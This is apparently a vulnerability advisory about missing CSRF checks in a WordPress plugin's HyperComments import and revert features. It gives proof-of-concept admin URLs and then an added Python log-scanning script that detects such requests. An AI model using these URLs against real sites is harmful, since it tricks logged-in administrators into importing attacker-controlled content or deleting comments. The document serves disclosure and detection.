The plugin does not have CSRF checks in the Import and Revert HyperComments features, allowing attackers to make a logged-in admin perform such actions via a CSRF attack.
Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a GET request in your server logs indicating that the import request is done.

To revert the imports (i.e. delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1

https://www.youtube.com/watch?v=75BH2m8cmPo
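A detection sketch for the requests described above, added here as an example and not part of the original advisory or the plugin: it scans web-server access logs in Combined Log Format for the import and revert URLs arriving without a same-site Referer. The hostname `example.com`, the function names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "example.com"  # assumption: the WordPress site's own hostname

# Combined Log Format: ip - user [time] "METHOD target PROTO" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

# Constructed sample lines (not real traffic): cross-site import, referer-less
# revert, revert started from the site's own admin page, plain page view.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2022:10:01:02 +0000] "GET /wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://collector.invalid HTTP/1.1" 200 5120 "https://forum.invalid/thread/42" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jan/2022:10:03:10 +0000] "GET /wp-admin/admin.php?r=import%2Fhypercomments&revert=1 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jan/2022:10:05:00 +0000] "GET /wp-admin/admin.php?r=import%2Fhypercomments&revert=1 HTTP/1.1" 200 4800 "https://example.com/wp-admin/admin.php?r=import%2Fhypercomments" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jan/2022:10:06:00 +0000] "GET /wp-admin/admin.php?r=import%2Fhypercomments HTTP/1.1" 200 4800 "-" "Mozilla/5.0"',
]

def classify(line, site_host=SITE_HOST):
    """Return a finding dict for an import/revert request lacking a same-site Referer."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    query = parse_qs(target.query, keep_blank_values=True)  # decodes %2F in r=
    if (not target.path.endswith("/wp-admin/admin.php")
            or query.get("r") != ["import/hypercomments"]):
        return None
    if "revert" in query:
        action = "revert"
    elif "url" in query:
        action = "import"
    else:
        return None  # plain page view, nothing is changed
    referer = m["referer"]
    ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
    if ref_host == site_host:
        return None  # request started from the site's own pages
    return {"time": m["time"], "ip": m["ip"], "action": action,
            "import_url": query.get("url", [None])[0],
            "referer": referer if ref_host else None}

def scan(lines, site_host=SITE_HOST):
    """Classify every log line and keep only the findings."""
    return [f for f in (classify(l, site_host) for l in lines) if f]
```

A missing Referer can also come from a browser's referrer policy, so findings are leads to triage against the comment table and the admin's activity, not proof of an attack.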
Brandon Roldan
Yes
2022-01-19
2022-04-10